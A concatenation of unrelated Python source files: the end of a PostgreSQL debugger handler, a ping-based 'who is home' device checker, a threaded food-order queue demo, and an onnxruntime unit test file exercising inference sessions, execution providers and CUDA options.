'v_lineno': v_lineno
}
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
elif v_state == debugState.Step:
v_database_control.v_connection.Execute('update omnidb.contexts set breakpoint = {0} where pid = {1}'.format(args['v_next_breakpoint'],v_tab_object['debug_pid']))
try:
v_database_control.v_connection.Execute('select pg_advisory_unlock({0}) from omnidb.contexts where pid = {0}; select pg_advisory_lock({0}) from omnidb.contexts where pid = {0};'.format(v_tab_object['debug_pid']))
#acquired the lock, get variables and lineno
v_variables = v_database_control.v_connection.Query('select name,attribute,vartype,value from omnidb.variables where pid = {0}'.format(v_tab_object['debug_pid']),True)
v_context_data = v_database_control.v_connection.Query('select lineno,finished from omnidb.contexts where pid = {0}'.format(v_tab_object['debug_pid']),True)
#not last statement
if (v_context_data.Rows[0][1]!='True'):
v_response['v_code'] = response.DebugResponse
v_response['v_data'] = {
'v_state': debugState.Ready,
'v_remove_context': True,
'v_variables': v_variables.Rows,
'v_lineno': v_context_data.Rows[0][0]
}
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
else:
v_database_control.v_connection.Execute('select pg_advisory_unlock({0}) from omnidb.contexts where pid = {0};'.format(v_tab_object['debug_pid']))
v_database_control.v_connection.Close()
v_response['v_code'] = response.RemoveContext
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception:
v_response['v_code'] = response.RemoveContext
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#Cancelling debugger, the thread executing the function will return the cancel status
elif v_state == debugState.Cancel:
v_tab_object['cancelled'] = True
v_database_control.v_connection.Cancel(False)
v_database_control.v_connection.Terminate(v_tab_object['debug_pid'])
v_database_control.v_connection.Close()
except Exception as exc:
v_response['v_code'] = response.DebugResponse
v_response['v_data'] = {
'v_state': debugState.Finished,
'v_remove_context': True,
'v_error': True,
'v_error_msg': str(exc)
}
try:
v_database_debug.v_connection.Close()
v_database_control.v_connection.Close()
except Exception:
None
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
|
WhoIsHome.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "MPZinke"
##########################################################################################
#
# created by: MPZinke
# on 2020.03.31
#
# DESCRIPTION:
# BUGS:
# FUTURE:
#
##########################################################################################
from datetime import datetime, timedelta
from os import devnull
import subprocess
from threading import Thread
from time import sleep
import ErrorWriter
class IPChecker:
def __init__(self, IP, image, name, wait=30): # IP address of device, user image, name of device, seconds between checks
self.IP = IP
self.user_image = image
self.name = name
self.wait = wait
self.is_home = False
self.has_not_ended = True
self.sleep_until_time = datetime.now()
self.thread = Thread(target=self.thread_loop)
def device_is_on_network(self):
with open(devnull, 'w') as FNULL:
return subprocess.call(["ping", "-c", "1", "-w", "1", self.IP], stdout=FNULL) == 0
def end(self):
self.has_not_ended = False
def sleep(self, sleep_until_time):
if isinstance(sleep_until_time, int):
self.sleep_until_time = datetime.now() + timedelta(seconds=sleep_until_time)
elif type(sleep_until_time) == type(self.sleep_until_time):
self.sleep_until_time = sleep_until_time
def start(self):
self.thread.start()
def thread_loop(self):
while self.has_not_ended:
while datetime.now() < self.sleep_until_time: sleep(15)
try: self.is_home = self.device_is_on_network()
except Exception as error: ErrorWriter.write_error(error)
sleep(self.wait)
|
food_ordering_system.py
|
import threading
import time
from collections import deque
class Queue:
def __init__(self):
self.buffer = deque()
def enqueue(self, val):
self.buffer.appendleft(val)
def dequeue(self):
if len(self.buffer)==0:
print("Queue is empty")
return
return self.buffer.pop()
def is_empty(self):
return len(self.buffer) == 0
def size(self):
return len(self.buffer)
food_order_queue = Queue()
def place_orders(orders):
for order in orders:
print("Placing order for:",order)
food_order_queue.enqueue(order)
time.sleep(0.5)
def serve_orders():
time.sleep(1)
while True:
order = food_order_queue.dequeue()
print("Now serving: ",order)
time.sleep(2)
if __name__ == '__main__':
orders = ['pizza','samosa','pasta','biryani','burger']
t1 = threading.Thread(target=place_orders, args=(orders,))
t2 = threading.Thread(target=serve_orders)
t1.start()
t2.start()
|
onnxruntime_test_python.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import unittest
import os
import numpy as np
import onnxruntime as onnxrt
import threading
import sys
from helper import get_name
from onnxruntime.capi.onnxruntime_pybind11_state import Fail
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testModelSerialization(self):
try:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
except Fail as onnxruntime_error:
if str(onnxruntime_error) == "[ONNXRuntimeError] : 1 : FAIL : Unable to serialize model as it contains" \
" compiled nodes. Please disable any execution providers which generate compiled nodes.":
pass
else:
raise onnxruntime_error
def testGetProviders(self):
self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue('CPUExecutionProvider' == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testEnablingAndDisablingTelemetry(self):
onnxrt.disable_telemetry_events()
# no-op on non-Windows builds
# may be no-op on certain Windows builds based on build configuration
onnxrt.enable_telemetry_events()
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testSetProvidersWithOptions(self):
if 'TensorrtExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertIn('TensorrtExecutionProvider', sess.get_providers())
options = sess.get_provider_options()
option = options['TensorrtExecutionProvider']
self.assertIn('device_id', option)
self.assertIn('trt_max_partition_iterations', option)
self.assertIn('trt_min_subgraph_size', option)
self.assertIn('trt_max_workspace_size', option)
self.assertIn('trt_dump_subgraphs', option)
self.assertIn('trt_engine_cache_enable', option)
self.assertIn('trt_engine_cache_path', option)
self.assertIn('trt_force_sequential_engine_build', option)
max_partition_iterations = option['trt_max_partition_iterations']
new_max_partition_iterations = int(max_partition_iterations) + 1
min_subgraph_size = option['trt_min_subgraph_size']
new_min_subgraph_size = int(min_subgraph_size) + 1
ori_max_workspace_size = option['trt_max_workspace_size']
new_max_workspace_size = int(ori_max_workspace_size) // 2
option = {}
option['trt_max_partition_iterations'] = new_max_partition_iterations
option['trt_min_subgraph_size'] = new_min_subgraph_size
option['trt_max_workspace_size'] = new_max_workspace_size
dump_subgraphs = "true"
option['trt_dump_subgraphs'] = dump_subgraphs
engine_cache_enable = "true"
option['trt_engine_cache_enable'] = engine_cache_enable
engine_cache_path = './engine_cache'
option['trt_engine_cache_path'] = engine_cache_path
force_sequential_engine_build = "true"
option['trt_force_sequential_engine_build'] = force_sequential_engine_build
sess.set_providers(['TensorrtExecutionProvider'], [option])
options = sess.get_provider_options()
option = options['TensorrtExecutionProvider']
self.assertEqual(option['trt_max_partition_iterations'], str(new_max_partition_iterations))
self.assertEqual(option['trt_min_subgraph_size'], str(new_min_subgraph_size))
self.assertEqual(option['trt_max_workspace_size'], str(new_max_workspace_size))
self.assertEqual(option['trt_dump_subgraphs'], '1')
self.assertEqual(option['trt_engine_cache_enable'], '1')
self.assertEqual(option['trt_engine_cache_path'], str(engine_cache_path))
self.assertEqual(option['trt_force_sequential_engine_build'], '1')
# We currently disable the following test code since not all test machines/GPUs have nvidia int8 capability
'''
int8_use_native_calibration_table = "false"
option['trt_int8_use_native_calibration_table'] = int8_use_native_calibration_table
int8_enable = "true"
option['trt_int8_enable'] = int8_enable
calib_table_name = '/home/onnxruntime/table.flatbuffers' # this file is not existed
option['trt_int8_calibration_table_name'] = calib_table_name
with self.assertRaises(RuntimeError):
sess.set_providers(['TensorrtExecutionProvider'], [option])
'''
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
import sys
import ctypes
CUDA_SUCCESS = 0
def runBaseTest1():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
option1 = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option1])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
option2 = {'device_id': -1}
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option2])
sess.set_providers(['CUDAExecutionProvider', 'CPUExecutionProvider'], [option1, {}])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
def runBaseTest2():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertIn('CUDAExecutionProvider', sess.get_providers())
# test get/set of "gpu_mem_limit" configuration.
options = sess.get_provider_options()
self.assertIn('CUDAExecutionProvider', options)
option = options['CUDAExecutionProvider']
self.assertIn('gpu_mem_limit', option)
ori_mem_limit = option['gpu_mem_limit']
new_mem_limit = int(ori_mem_limit) // 2
option['gpu_mem_limit'] = new_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['gpu_mem_limit'], str(new_mem_limit))
option['gpu_mem_limit'] = ori_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['gpu_mem_limit'], ori_mem_limit)
def test_get_and_set_option_with_values(option_name, option_values):
provider_options = sess.get_provider_options()
self.assertIn('CUDAExecutionProvider', provider_options)
cuda_options = provider_options['CUDAExecutionProvider']
self.assertIn(option_name, cuda_options)
for option_value in option_values:
cuda_options[option_name] = option_value
sess.set_providers(['CUDAExecutionProvider'], [cuda_options])
new_provider_options = sess.get_provider_options()
self.assertEqual(
new_provider_options.get('CUDAExecutionProvider', {}).get(option_name),
str(option_value))
test_get_and_set_option_with_values(
'arena_extend_strategy', ['kNextPowerOfTwo', 'kSameAsRequested'])
test_get_and_set_option_with_values(
'cudnn_conv_algo_search', ["DEFAULT", "EXHAUSTIVE", "HEURISTIC"])
test_get_and_set_option_with_values(
'do_copy_in_default_stream', [0, 1])
option['gpu_external_alloc'] = '0'
option['gpu_external_free'] = '0'
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['gpu_external_alloc'], '0')
self.assertEqual(options['CUDAExecutionProvider']['gpu_external_free'], '0')
#
# Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
# so run them last. Each set_providers call will attempt to re-create a session, so it's
# fine for a test that fails to run immediately after another one that fails.
# Alternatively a valid call to set_providers could be used to recreate the underlying session
# after a failed call.
#
option['arena_extend_strategy'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['gpu_mem_limit'] = -1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['gpu_mem_limit'] = 1024.1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['gpu_mem_limit'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
def getCudaDeviceCount():
import ctypes
num_device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
result = cuda.cuInit(0)
result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
return -1
return num_device.value
def setDeviceIdTest(i):
import ctypes
import onnxruntime as onnxrt
device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
option = {'device_id': i}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
result = cuda.cuCtxGetDevice(ctypes.byref(device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
self.assertEqual(result, CUDA_SUCCESS)
self.assertEqual(i, device.value)
def runAdvancedTest():
num_device = getCudaDeviceCount()
if num_device < 0:
return
# Configure session to be ready to run on all available cuda devices
for i in range(num_device):
setDeviceIdTest(i)
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# configure session with invalid option values and that should fail
with self.assertRaises(RuntimeError):
option = {'device_id': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'device_id': 'invalid_value'}
sess.set_providers(['CUDAExecutionProvider'], [option])
# configure session with invalid option should fail
with self.assertRaises(RuntimeError):
option = {'invalid_option': 123}
sess.set_providers(['CUDAExecutionProvider'], [option])
libnames = ('libcuda.so', 'libcuda.dylib', 'cuda.dll')
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
runBaseTest1()
runBaseTest2()
runAdvancedTest()
except OSError:
continue
else:
break
else:
runBaseTest1()
runBaseTest2()
# raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(RuntimeError) as context:
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
sess.set_providers(['InvalidProvider'])
self.assertTrue('Unknown Provider Type: InvalidProvider' in str(context.exception))
def testSessionProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
available_providers = onnxrt.get_available_providers()
# Skip this test for a "pure" DML onnxruntime python wheel. We keep this test enabled for instances where both DML and CUDA
# EPs are available (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precedence than DML
# and the nodes are assigned to only the CUDA EP (which supports this test)
if ('DmlExecutionProvider' in available_providers and not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelMultipleThreads as the DML EP does not support calling Run() on different threads using the same session object ")
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output Y has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array([[True, False], [False, False]], dtype=bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
# numpy 1.20+ doesn't automatically pad the bytes based entries in the array when dtype is np.void,
# so we use inputs where that is the case
x = np.array([b'must', b'have', b'same', b'size'], dtype=np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
expr = np.array([['must', 'have'], ['same', 'size']], dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path)
modelmeta = sess.get_modelmeta()
self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
self.assertEqual('', modelmeta.graph_description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue('[' in lines[0])
for i in range(1, 8):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[8])
def testProfilerGetStartTimeNs(self):
def getSingleSessionProfilingStartTime():
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
return sess.get_profiling_start_time_ns()
# Get 1st profiling's start time
start_time_1 = getSingleSessionProfilingStartTime()
# Get 2nd profiling's start time
start_time_2 = getSingleSessionProfilingStartTime()
# Get 3rd profiling's start time
start_time_3 = getSingleSessionProfilingStartTime()
# Chronological profiling's start time
self.assertTrue(start_time_1 <= start_time_2 <= start_time_3)
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# default should be ORT_ENABLE_ALL (all graph optimizations)
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt)
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"))
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(get_name("sequence_construct.onnx"))
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
]
res = sess.run(
[output_name], {
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(get_name("sequence_insert.onnx"), sess_options=opt)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": []
})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
